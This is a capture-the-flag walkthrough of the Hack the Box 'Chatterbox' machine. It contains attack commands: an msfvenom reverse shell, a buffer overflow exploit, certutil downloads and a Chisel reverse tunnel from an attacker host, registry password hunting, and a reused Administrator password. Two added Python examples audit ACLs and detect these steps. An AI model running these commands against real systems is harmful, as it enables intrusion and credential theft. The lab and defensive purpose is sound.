Hack the Box - Chatterbox - Walkthrough
Introduction
Today we're going to be doing a pentest walkthrough of the Chatterbox machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Chatterbox machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.81.94
Scanning and Enumeration
We'll start by scanning for open ports with Nmap:
sudo nmap -T4 -p- 10.129.81.94
Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:
sudo nmap -sV -T4 -p9255,9256 10.129.81.94
There's only one service listed here, so let's see if there's any public exploit for it:
searchsploit achat
searchsploit -x 36025.py
We've got a Python buffer overflow exploit, which requires us to supply a payload and the IP address of the target. To execute this, we'll need to:
1) Copy the exploit to our working directory
2) Set up a Netcat listener on our attacking system
3) Create a payload for the script using MSFvenom
4) Modify the exploit script
5) Execute the exploit script
Step 1
We copy the exploit script to our working directory and rename it:
searchsploit -m 36025 && mv 36025.py AchatBOF.py
Step 3
Create the payload for the exploit using MSFvenom:
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=tun0 LPORT=9255 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Step 4
Modify the exploit script, replacing the payload and IP address portions:
gedit AchatBOF.py
Step 5
With our script modified and our listener setup, we can now execute the script:
python AchatBOF.py
whoami
Capturing the User Flag
On Hack the Box Windows machines, the user flag is usually located in a user's \Desktop directory. In this case, it's in the Alfred user's:
type c:\users\alfred\desktop\user.txt
Foothold Enumeration
While we enumerate the system, we know that our objective Root flag file is located in the Administrator's \Desktop directory. Normally, on a securely configured Windows system, each profile under \Users is inaccessible to every user except its owner. On this system, our current Alfred user has access to the Administrator's profile under \Users, including the \Desktop directory where the root.txt flag is.
This leads us to two possibilities about the user structure of the system:
1) Alfred is the administrator on this system, but they prefer to work in the Alfred account, so they gave the Alfred account elevated file permissions.
2) The system's file permissions in general are misconfigured, giving all users elevated file permissions.
We check exactly how high our file permissions go by using the icacls command on the Administrator's \Desktop directory:
icacls c:\users\administrator\desktop
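To turn this manual icacls check into a repeatable audit, here is an added Python example (not part of the walkthrough) that parses icacls output and flags any principal other than SYSTEM, Administrators and the profile owner holding write-class rights on the profile. The sample output is constructed, and CHATTERBOX is an assumed machine name.

```python
import re

# Constructed sample of `icacls c:\users\administrator\desktop` output (not the box's
# real output; the CHATTERBOX machine name is assumed). Indented lines are further ACEs.
SAMPLE_ICACLS = r"""c:\users\administrator\desktop NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                               BUILTIN\Administrators:(OI)(CI)(F)
                               CHATTERBOX\Administrator:(OI)(CI)(F)
                               CHATTERBOX\Alfred:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

TRUSTED = {"nt authority\\system", "builtin\\administrators"}  # always hold full control
INHERIT = {"OI", "CI", "IO", "NP", "I"}  # inheritance flags, not access rights
RISKY = {"F", "M", "W", "D", "WDAC", "WO"}  # full, modify, write, delete, write DAC/owner

ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<flags>(?:\([^)]*\))+)$")

def parse_icacls(text):
    """Yield (path, principal, rights) for every ACE in icacls output.
    Assumes paths without spaces, as in the walkthrough."""
    path = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if not raw[0].isspace():  # path line: "<path> <first ACE>"
            path, _, line = line.partition(" ")
        m = ACE_RE.match(line)
        if not m:
            continue
        groups = re.findall(r"\(([^)]*)\)", m.group("flags"))
        rights = {r for g in groups for r in g.split(",")} - INHERIT
        yield path, m.group("principal"), rights

def audit_profile_acl(text, owner):
    """Flag ACEs granting risky rights on a profile to anyone other than
    SYSTEM, Administrators, or the profile owner (matched by short name)."""
    findings = []
    for path, principal, rights in parse_icacls(text):
        short = principal.split("\\")[-1].lower()
        if principal.lower() in TRUSTED or short == owner.lower():
            continue
        if rights & RISKY:
            findings.append((path, principal, sorted(rights & RISKY)))
    return findings

if __name__ == "__main__":
    for path, who, rights in audit_profile_acl(SAMPLE_ICACLS, "administrator"):
        print(f"{who} holds {','.join(rights)} on {path}")
```

Run over the real output of `icacls c:\users\<user>` for each profile, a non-empty result is exactly the condition hypothesis 2 above describes.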
Capturing the Root Flag
Alfred and the Administrator both have the same file permissions in this directory, which means we can change the file permissions for any file in the directory, including the root.txt file. We do this now, then access the flag:
icacls c:\users\administrator\desktop\root.txt /grant alfred:F
type root.txt
Privilege Escalation (Becoming Administrator)
For educational purposes, we would also like to find a method of privilege escalation on the system, accessing either the SYSTEM or Administrator accounts.
While searching through the system registry for passwords, we find this:
reg query HKLM /f password /t REG_SZ /s
This is a good hit, so we look a little deeper:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /s
With these credentials, we can remotely log in to the system as Alfred using Winexe. If our earlier hypothesis that Alfred and the Administrator are the same person is correct, it's possible that these two accounts share the same password, so if we can log in using Winexe, we could try logging in as the Administrator user. This requires network port 445 to be accessible, but from our initial Nmap scan we know that this port is not open to outside machines.
However, if the port is open internally, we can perform local port forwarding to make the port accessible to our attacking machine. We check if port 445 is open locally on this system:
netstat -ano
Port 445 is listening locally, which means we can attempt to perform local port forwarding via the Chisel program.
Installing Chisel on Kali was covered in our previous walkthrough for the Buff Hack the Box machine, but a quick rundown of the commands to run (as the root account) follows:
curl https://i.jpillora.com/chisel! | bash
We also need to transfer a Chisel binary to the target machine to complete the port-forwarding connection. First, we need to check whether the target Windows system is 32- or 64-bit by listing its environment variables:
set
The system is 32-bit, so we download the 32-bit binary of Chisel to our attacking machine:
wget https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_windows_386.gz
Then we gunzip the .gz file and rename the executable to something more convenient:
gunzip chisel_1.7.6_windows_386.gz
mv chisel_1.7.6_windows_386 chisel32.exe
Now to transfer the file to the Windows machine. First we serve the file using Python's HTTP server module:
sudo python -m SimpleHTTPServer 9255
Then, from the Windows machine, we move to a publicly writable directory, then use Certutil to download the file:
cd c:\users\public\downloads
certutil -urlcache -split -f http://10.10.99.99:9255/chisel32.exe
With Chisel on both machines, we start the connection by starting Chisel on our attacking machine:
sudo chisel server -p 9000 --reverse
(note: we rename the Chisel binary on the Windows machine for convenience before the next step)
And to finish the port-forwarding connection, we start Chisel on the Windows machine:
rename chisel32.exe chisel.exe
chisel.exe client 10.10.99.99:9000 R:445:0.0.0.0:445
Now that the port forward is established, we can attempt to remotely log in to the system as Administrator using Alfred's password via the Winexe program.
winexe -U 'administrator%Welcome1!' //127.0.0.1 cmd.exe
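From the defensive side, the post-foothold chain above (registry search for passwords, certutil download, Chisel reverse tunnel, icacls grant on another user's profile) leaves distinctive process-creation command lines. The following is an added example, not part of the walkthrough, that runs simple detections over constructed events in an assumed "timestamp|user|image|commandline" layout; the machine name CHATTERBOX and the timestamps are made up.

```python
import re

# Constructed process-creation events (not real telemetry from the box), in an
# assumed "timestamp|user|image|commandline" layout, replaying the commands
# from the walkthrough plus one benign icacls call on Alfred's own profile.
EVENTS = r"""2024-01-01T10:00:01|CHATTERBOX\Alfred|C:\Windows\System32\cmd.exe|whoami
2024-01-01T10:00:05|CHATTERBOX\Alfred|C:\Windows\System32\reg.exe|reg query HKLM /f password /t REG_SZ /s
2024-01-01T10:00:09|CHATTERBOX\Alfred|C:\Windows\System32\certutil.exe|certutil -urlcache -split -f http://10.10.99.99:9255/chisel32.exe
2024-01-01T10:00:15|CHATTERBOX\Alfred|C:\Users\Public\Downloads\chisel.exe|chisel.exe client 10.10.99.99:9000 R:445:0.0.0.0:445
2024-01-01T10:00:20|CHATTERBOX\Alfred|C:\Windows\System32\icacls.exe|icacls c:\users\administrator\desktop\root.txt /grant alfred:F
2024-01-01T10:00:30|CHATTERBOX\Alfred|C:\Windows\System32\icacls.exe|icacls c:\users\alfred\notes.txt /grant alfred:F
"""

# Command-line patterns for the post-exploitation steps seen above (case-insensitive).
RULES = {
    "registry credential hunting": re.compile(r"\breg(?:\.exe)?\s+query\b.*\s/f\s+\S*pass", re.I),
    "certutil remote download":    re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I),
    "reverse tunnel client":       re.compile(r"\bclient\s+\S+:\d+\s+R:\d+:", re.I),
}
PROFILE_RE = re.compile(r"[\\/]users[\\/]([^\\/]+)[\\/]", re.I)

def icacls_cross_profile(user, cmdline):
    """True when icacls /grant targets a path under another user's profile."""
    if not re.search(r"\bicacls(?:\.exe)?\b.*\s/grant\b", cmdline, re.I):
        return False
    m = PROFILE_RE.search(cmdline)
    owner = m.group(1).lower() if m else None
    return owner not in (None, "public", user.split("\\")[-1].lower())

def detect(events):
    """Return (timestamp, rule, commandline) for each matching event."""
    findings = []
    for line in events.splitlines():
        if not line.strip():
            continue
        ts, user, _image, cmdline = line.split("|", 3)
        for name, rx in RULES.items():
            if rx.search(cmdline):
                findings.append((ts, name, cmdline))
        if icacls_cross_profile(user, cmdline):
            findings.append((ts, "ACL grant on another user's profile", cmdline))
    return findings

if __name__ == "__main__":
    for ts, rule, cmd in detect(EVENTS):
        print(f"{ts}  {rule}: {cmd}")
```

The benign icacls call on Alfred's own profile is deliberately not flagged, so the profile-owner comparison is what separates the root.txt grant from routine use.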
Summary
After initial scans, we found that the target system was running a vulnerable network service that had an associated public buffer overflow exploit. Through that exploit, we were able to establish a foothold on the system. The system's file permissions allowed us to capture the objective flag file, but we also wished to achieve administrator status on the system. Enumeration of the system revealed exposed passwords, and by utilizing port forwarding on the system we were able to log in as the Administrator user due to password reuse.
Finish